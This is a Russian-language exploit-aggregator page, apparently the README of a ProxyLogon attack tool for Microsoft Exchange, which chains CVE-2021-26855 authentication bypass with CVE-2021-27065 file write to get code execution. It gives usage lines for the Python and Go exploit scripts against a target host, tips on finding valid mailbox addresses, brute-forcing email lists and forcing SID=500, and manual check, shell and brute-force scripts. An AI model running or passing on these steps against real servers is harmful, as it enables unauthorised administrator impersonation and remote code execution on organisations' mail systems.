## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KH4SH3I-PROXYLOGON
# ProxyLogon
ProxyLogon — это формальное общее название для CVE-2021-26855, уязвимости на Microsoft Exchange Server, которая позволяет злоумышленнику обойти аутентификацию и выдать себя за администратора. Мы также объединили эту ошибку с другой уязвимостью после аутентификации — произвольной записью файлов (CVE-2021-27065), чтобы получить выполнение кода.
## ProxyLogon для Python3
root@kitploit:~
usage:
sudo python3 proxylogon.py --host=target.com some-email@example.com
sudo python3 proxylogon.py --host=target.com --mails=./mails.txt
## ProxyLogon для Go
root@kitploit:~
usage:
go run proxylogon.go -u target.com -e some-email@example.com
#### Советы:
1. проведите разведку цели, чтобы найти действительный адрес электронной почты
2. если вы не нашли ни одного адреса, используйте перебор цели с вашим файлом email-адресов
3. в некоторых целях автоматический эксплойт не срабатывает, поэтому следует перебрать SID и заменить его на SID=500
### ручной пентест
root@kitploit:~
sudo python2 /manual/check.py
sudo python2 /manual/shell.py
sudo python2 /manual/brute.py
    
#### ссылки
* proxylogon